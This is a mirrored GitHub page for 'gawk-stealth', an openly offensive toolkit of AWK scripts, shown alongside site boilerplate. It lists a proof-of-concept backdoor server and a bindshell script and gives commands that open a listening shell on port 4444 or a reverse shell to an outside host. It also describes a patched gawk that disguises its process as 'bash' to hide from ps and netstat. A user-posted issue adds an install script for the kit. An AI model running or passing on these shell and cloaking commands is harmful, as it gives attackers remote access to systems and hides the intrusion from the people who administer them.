GithubHelp home page GithubHelp logo

gawk-stealth's Introduction

#[gawk-stealth](http://gitbrew.org/gawk)  
##Copyright (C) 2012 Iadnah [<[email protected]>](mailto:[email protected])  
##gawk-stealth is distributed under the GNU GPL  
  
  
###SYNOPSIS  
  
Gawk-Stealth consists of two parts: a set of scripts that can be run from within GNU AWK (using the -f option), and a statically linked 32-bit version of GNU AWK that is patched with our Romulan Cloaking technology.  
  
The scripts included in gawk-stealth are:  
banner_grab.gawk - simple awk banner grabber
banner_grab_pastable.gawk - one-line pastable version of the banner grabber
gawk_get.gawk - script to make an HTTP (no HTTPS) request and dump output to STDOUT
gawk_http_bnc.gawk - Listens on a port and when a connection is made to it, performs an HTTP request as configured and redirects output to connecting host
gawkserv.gawk - Very simple POC backdoor server
rgawkcmd-0.2.gawk - Full-featured bindshell with listen, reverse-connect, and authentication options
  
###COMPILING gawk32.static    
  
To compile, untar the version of gawk in static_gawk, apply the gawk-3.1.8_gawkhide.patch, and compile using the makestatic script.  
  
###SAMPLE USES  
  
The main script of interest is rgawkcmd-0.2.gawk.  When using it, the most important thing to keep in mind is that options are set using environmental variables.  In bash, you may set these with the export command, or to make more persistent you can add the env vars to .bashrc in the home directory.  

To make a listening bindshell with rgawkcmd-0.2.gawk, issue the following commands:  

	$ export RGC_LPORT=4444
	$ export RGC_MODE="listen"
	$ gawk -f rgawkcmd-0.2.gawk

This will open up a listening bindshell on port 4444.  To do a reverse bindshell, you would enter:  

	$ export RGC_MODE="remote"
	$ export RGC_RPORT=4444
	$ export RGC_HOST="totallylegitimate.nationalbankofuganda.com"
	$ gawk -f rgawkcmd-0.2.gawk
	
###ROMULAN CLOAKING TECHNOLOGY

In order to turn on Romulan Cloaking Device (reverse engineered by CDR Data from a Romulan Warbird captured by CPT Jean-Luc Picard), set GAWK_HIDE to anything but NULL.  Example:  

	$ export GAWK_HIDE=1
	
This changes argv[0] to read "bash" (for ps and netstat purposes).  
NOTE: this requires you use patched version of GNU AWK included with this package.  

##LICENSE  
gawk-stealth Copyright (C) 2012 Iadnah [email protected]

This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA

See the COPYING file for more information.

---
Iadnah [<[email protected]>](mailto:[email protected])  
Security Consultant  
[gitbrew.org](http://gitbrew.org)  
[Hephaestus Security](http://hephaestussec.com)

gawk-stealth's People

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

gawk-stealth's Issues

Gawk-Stealth Bash

#!/bin/bash

Install Git if not already installed

apt-get update
apt-get install -y git

Clone the gawk-stealth repository

git clone https://github.com/gitbrew/gawk-stealth.git

Change to the project directory

cd gawk-stealth

Build and install gawk-stealth

make install

Clean up

cd ..
rm -rf gawk-stealth

echo "gawk-stealth has been successfully installed."

Save the above script to a file, for example, install_gawk_stealth.sh. Make the script executable by running the following command:

chmod +x install_gawk_stealth.sh

Then, you can execute the script by running:

./install_gawk_stealth.sh

This script will install Git (if not already installed), clone the gawk-stealth repository, build and install the project, and finally, clean up the temporary files. It will display a message confirming the successful installation of gawk-stealth.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.